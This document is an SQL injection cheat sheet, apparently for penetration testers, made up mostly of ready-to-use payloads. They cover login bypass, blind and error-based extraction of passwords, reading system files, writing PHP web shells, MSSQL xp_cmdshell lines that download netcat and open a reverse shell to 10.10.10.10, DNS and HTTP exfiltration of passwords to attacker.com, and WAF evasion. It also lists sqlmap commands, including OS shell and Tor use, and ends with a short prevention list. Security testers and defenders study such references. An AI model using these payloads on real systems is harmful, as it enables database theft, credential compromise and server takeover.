SQL Injection
SQL injection is a vulnerability within a web application that allows an attacker to interfere with normal queries that a web app makes to its database. Generally speaking this will allow unauthorised attackers to view data such as usernames, user account details, credit card details, password hashes and so on. SQL injection can also lead to Remote Code Execution (RCE) and an attacker gaining a shell on the vulnerable server.
External Resources
- PortSwigger - SQL Injection cheatsheet
- PayloadsAllTheThings - SQL Injection
- OWASP SQL Injection Prevention Cheat Sheet
Detection Techniques
Basic Tests
'
"
`
')
")
`)
';
";
`;
-- or #
' OR '1'='1
" OR "1"="1
' OR '1'='1' --
" OR "1"="1" --
' OR 1=1 --
" OR 1=1 --
or 1=1 --
' or 1=1 #
" or 1=1 #
or 1=1 #
' or '1'='1
" or "1"="1Error-Based Testing
' AND 1=1 --
' AND 1=2 --
' OR 1=1 --
' OR 1=2 --
" AND 1=1 --
" AND 1=2 --
" OR 1=1 --
" OR 1=2 --
' AND '1'='1
' AND '1'='2
' OR '1'='1
' OR '1'='2Time-Based Blind Testing
' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --
' OR (SELECT * FROM (SELECT(SLEEP(5)))a) --
" AND (SELECT * FROM (SELECT(SLEEP(5)))a) --
" OR (SELECT * FROM (SELECT(SLEEP(5)))a) --
' AND pg_sleep(5) --
" AND pg_sleep(5) --
' OR pg_sleep(5) --
" OR pg_sleep(5) --
' AND SLEEP(5) --
" AND SLEEP(5) --
' OR SLEEP(5) --
" OR SLEEP(5) --
' AND dbms_lock.sleep(5) --
" AND dbms_lock.sleep(5) --Boolean-Based Blind Testing
' AND 1=1 --
' AND 1=2 --
' AND ASCII(SUBSTRING((SELECT database()), 1, 1)) > 90 --
' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1), 1, 1)) > 90 --
' AND (SELECT 1 FROM users LIMIT 1) = 1 --
' AND (SELECT COUNT(*) FROM users) > 0 --
' AND SUBSTR(@@version,1,1) = '5' --Authentication Bypass
Single Quotes
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055Double Quotes
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055Database Fingerprinting
Version Detection
# MySQL
' UNION SELECT @@version --
' UNION SELECT version() --
# Microsoft SQL Server
' UNION SELECT @@version --
' UNION SELECT SERVERPROPERTY('ProductVersion') --
# Oracle
' UNION SELECT banner FROM v$version --
' UNION SELECT version FROM v$instance --
# PostgreSQL
' UNION SELECT version() --
# SQLite
' UNION SELECT sqlite_version() --Database Type Detection
# MySQL
' AND (SELECT 1 FROM dual) --
' AND LEFT(VERSION(),1) = '5' --
# Microsoft SQL Server
' AND (SELECT 'test' WHERE 1=1) = 'test' --
' AND SUBSTRING(@@version,1,1) = '1' --
# Oracle
' AND ROWNUM = 1 --
' AND EXISTS (SELECT 'x' FROM dual) --
# PostgreSQL
' AND (SELECT current_database()) IS NOT NULL --
' AND 1::int = 1 --
# SQLite
' AND typeof(1) = 'integer' --
' AND sqlite_version() IS NOT NULL --Column Enumeration
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
' ORDER BY 10--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL FROM DUAL-- # Use DUAL for Oracle QueriesFinding Columns That Can Hold String Values
' UNION SELECT 'p',NULL,NULL,NULL--
' UNION SELECT NULL,'p',NULL,NULL--
' UNION SELECT NULL,NULL,'p',NULL--
' UNION SELECT NULL,NULL,NULL,'p'--Retrieving Data with UNION
' UNION SELECT username,password FROM users--
' UNION SELECT username,password FROM users WHERE username='administrator'--
' UNION SELECT username || '~' || password FROM users-- # Oracle concat to one string
' UNION SELECT NULL,concat(username, ' : ', password) FROM users-- # MySQL concat to one string
' UNION SELECT NULL,'admin' FROM users--
' UNION SELECT NULL,username FROM users WHERE username LIKE 'a%'-- # Find usernames starting with 'a'
' UNION SELECT NULL,username FROM users WHERE username LIKE '%n'-- # Find usernames ending with 'n'Examining Database Structure
Table Information
# MySQL & PostgreSQL
' UNION SELECT NULL,table_name FROM information_schema.tables--
' SELECT * FROM information_schema.tables--
' SELECT * FROM information_schema.columns WHERE table_name = 'users'--
' UNION SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'--
# Oracle
' UNION SELECT NULL,table_name FROM all_tables--
' SELECT * FROM all_tables--
' SELECT * FROM all_tab_columns WHERE table_name = 'USERS'--
' UNION SELECT NULL,column_name FROM all_tab_columns WHERE table_name = 'USERS'--
# SQLite
' UNION SELECT NULL,name FROM sqlite_master WHERE type='table'--
' UNION SELECT NULL,sql FROM sqlite_master WHERE type='table' AND name='users'--
# MSSQL
' UNION SELECT NULL,table_name FROM information_schema.tables--
' UNION SELECT NULL,column_name FROM information_schema.columns WHERE table_name = 'users'--
' UNION SELECT name,NULL FROM sysobjects WHERE xtype = 'U'-- # User tablesColumn Information
# MySQL & PostgreSQL
' UNION SELECT NULL,column_name FROM information_schema.columns WHERE table_name = 'users'--
' SELECT column_name FROM information_schema.columns WHERE table_name = 'users'--
# Oracle
' UNION SELECT NULL,column_name FROM all_tab_columns WHERE table_name = 'USERS'--
' SELECT column_name FROM all_tab_columns WHERE table_name = 'USERS'--
# SQLite
' UNION SELECT NULL,sql FROM sqlite_master WHERE type='table' AND name='users'--
# MSSQL
' UNION SELECT NULL,column_name FROM information_schema.columns WHERE table_name = 'users'--
' SELECT column_name FROM information_schema.columns WHERE table_name = 'users'--File Operations
Read Files
# MySQL
' UNION SELECT LOAD_FILE('/etc/passwd')--
' UNION SELECT NULL,LOAD_FILE('/etc/passwd')--
' UNION SELECT NULL,LOAD_FILE('C:/Windows/win.ini')--
' UNION SELECT NULL,LOAD_FILE('/var/www/html/index.php')--
# PostgreSQL
' UNION SELECT NULL,pg_read_file('/etc/passwd',0,1000)--
' UNION SELECT NULL,pg_read_file('/var/www/html/index.php',0,1000)--
# MSSQL
' UNION SELECT NULL, BulkColumn FROM OPENROWSET(BULK 'C:/Windows/win.ini', SINGLE_BLOB) AS x--Write Files
# MySQL
' UNION SELECT 'test' INTO OUTFILE '/var/www/html/test.txt'--
' UNION SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'--
' UNION SELECT NULL,'<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'--
# PostgreSQL (requires admin privileges)
' UNION SELECT NULL,lo_export(16384, '/tmp/test.txt')--
' UNION SELECT lo_import('/tmp/malicious.php', 12345)--Blind SQL Injection Techniques
Conditional Responses
' AND (SELECT 'x' FROM users WHERE username='administrator' AND LENGTH(password)>5) = 'x'--
' AND (SELECT SUBSTRING(username,1,1) FROM users WHERE username='administrator') = 'a'--
' AND (SELECT ascii(substring(username,1,1)) FROM users WHERE username='administrator') = 97-- # 'a' is ASCII 97Time-Based Techniques
# MySQL
' AND IF(1=1, SLEEP(5), 0)--
' AND IF((SELECT 'x' FROM users WHERE username='administrator'), SLEEP(5), 0)--
' AND IF((SELECT SUBSTRING(username,1,1) FROM users WHERE username='administrator')='a', SLEEP(5), 0)--
# PostgreSQL
' AND (SELECT CASE WHEN (username='administrator') THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users)--
' AND (SELECT CASE WHEN (SUBSTRING(username,1,1)='a') THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--
# Oracle
' AND CASE WHEN (1=1) THEN dbms_pipe.receive_message('RDS',5) ELSE NULL END--
' AND CASE WHEN (SUBSTR((SELECT username FROM users WHERE username='administrator'),1,1)='a') THEN dbms_pipe.receive_message('RDS',5) ELSE NULL END--
# MSSQL
' IF (1=1) WAITFOR DELAY '0:0:5'--
' IF (SELECT COUNT(username) FROM users WHERE username = 'administrator') = 1 WAITFOR DELAY '0:0:5'--
' IF (SUBSTRING((SELECT TOP 1 username FROM users),1,1) = 'a') WAITFOR DELAY '0:0:5'--Error-Based Techniques
# MySQL
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--
' AND UPDATEXML(1, CONCAT(0x7e, (SELECT password FROM users WHERE username='administrator'), 0x7e), 1)--
# PostgreSQL
' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
' AND 1=CAST((SELECT password FROM users WHERE username='administrator') AS int)--
# Oracle
' AND EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><root>test</root>'),'/root') = 'test'--
' AND EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><root>'||(SELECT username FROM users WHERE ROWNUM=1)||'</root>'),'/root')--
# MSSQL
' AND 1=CONVERT(int,(SELECT @@version))--
' AND 1=CONVERT(int,(SELECT TOP 1 username FROM users))--Second-Order SQL Injection
When the injection happens in one request, but its effects are seen in a subsequent request.
# Stage 1: Register a user with a payload as the username
Username: admin'--
Password: password
# Stage 2: After registration, log in with the new user and watch for SQL injection when the application uses the stored username
# Example of payload for username field that might be used later in admin panel
admin' OR '1'='1NoSQL Injection
MongoDB
# Basic authentication bypass for MongoDB in PHP/Node.js apps
username[$ne]=admin&password[$ne]=
username[$regex]=^adm&password[$ne]=
username[$eq]=admin&password[$gt]=
username[$exists]=true&password[$exists]=true
# MongoDB operator injection
username[$regex]=.*&password[$regex]=.*
username[$eq]=admin&password[$regex]=p.*
username[$eq]=admin&password[$regex]=^pass.*$
# MongoDB JavaScript injection (if $where or mapReduce is used)
' || '1'=='1
'; return '' == '
' && this.password.match(/.*/)//
';sleep(5000);'
';while(true){}//WAF Bypass Techniques
# Case variation
' Or 1=1--
' oR 1=1--
' OR 1=1--
# Whitespace alternatives
'OR(1=1)--
'OR/**/1=1--
'OR%091=1-- # %09 is a tab
# Comment variations
'OR 1=1--
'OR 1=1#
'OR 1=1/*
'OR 1=1;%00
# String concatenation
# MySQL
'OR CONCAT('1','=','1')--
# Oracle
'OR'1'||'='||'1'--
# SQL Server
'OR CHAR(49)+'='+CHAR(49)--
# Encoding
'OR 1%3d1-- # URL encoding = is %3d
'OR 0x31=0x31-- # Hex encoding
# Logical equivalents
'OR 2>1--
'OR 'a'='a'--
'OR 1 AND 1--
'OR 1 BETWEEN 1 AND 1--Advanced Exploitation
Command Execution
# MySQL (requires FILE privilege)
' UNION SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'--
' UNION SELECT NULL, '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'--
# MSSQL
'; EXEC xp_cmdshell 'ping 10.10.10.10'--
'; EXEC master..xp_cmdshell 'whoami'--
'; EXEC master..xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.10.10/nc.exe -OutFile C:\Windows\Temp\nc.exe"'--
'; EXEC master..xp_cmdshell 'C:\Windows\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe'--
# PostgreSQL
' COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php'--
'; SELECT pg_ls_dir('.');--
'; CREATE TABLE cmd_exec(cmd_output text);--
'; COPY cmd_exec FROM PROGRAM 'whoami';--
'; SELECT * FROM cmd_exec;--Out-of-Band Techniques
# MySQL (DNS exfiltration)
' UNION SELECT LOAD_FILE(CONCAT('\\\\',version(),'.attacker.com\\test.txt'))--
' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\test.txt'))--
# MSSQL
'; DECLARE @q varchar(1024);SET @q='\\'+HOST_NAME()+'.attacker.com\a'; EXEC master..xp_dirtree @q;--
'; DECLARE @q varchar(1024);SET @q='\\'+SYSTEM_USER+'.attacker.com\a'; EXEC master..xp_dirtree @q;--
# Oracle
' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT user FROM dual)||'.attacker.com/"> %remote;]>'),'/l') FROM dual--
' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT password FROM users WHERE ROWNUM=1)) FROM dual--SQL Map Commands
# Basic scan
sqlmap -u "http://target.com/page.php?id=1"
# Specify POST data
sqlmap -u "http://target.com/login.php" --data="username=test&password=test"
# Use a specific parameter
sqlmap -u "http://target.com/page.php?id=1" -p id
# Specify the DBMS
sqlmap -u "http://target.com/page.php?id=1" --dbms=mysql
# Use cookie for authenticated scan
sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=1234abcd"
# Enumerate databases
sqlmap -u "http://target.com/page.php?id=1" --dbs
# Enumerate tables in a database
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables
# Dump table contents
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users --dump
# Get a shell
sqlmap -u "http://target.com/page.php?id=1" --os-shell
# Time-delay blind testing
sqlmap -u "http://target.com/page.php?id=1" --technique=T
# Use Tor for anonymity
sqlmap -u "http://target.com/page.php?id=1" --tor --tor-type=SOCKS5
# Test WAF bypass
sqlmap -u "http://target.com/page.php?id=1" --tamper=space2comment,betweenPrevention Tips
- Use Prepared Statements / Parameterized Queries
- The safest approach to prevent SQL injection
- Separate SQL code from data
- Available in all modern programming languages and frameworks
- ORM (Object-Relational Mapping) Libraries
- Most ORM libraries use parameterized queries internally
- Examples: Hibernate (Java), Entity Framework (C#), SQLAlchemy (Python)
- Input Validation
- Whitelist validation (allow only known good input)
- Reject or sanitize invalid inputs
- Stored Procedures
- Encapsulate SQL code within the database
- Restrict permissions to database users
- Least Privilege
- Use database accounts with minimal permissions
- Different applications should use different database accounts
- Database Abstraction Layers
- Provide safe alternatives to direct SQL queries
- Example: PDO in PHP
- Web Application Firewalls (WAF)
- Add an extra layer of protection
- Block common SQL injection patterns
- Regular Auditing and Testing
- Perform security code reviews
- Use automated scanning tools like SQLMap
- Conduct penetration testing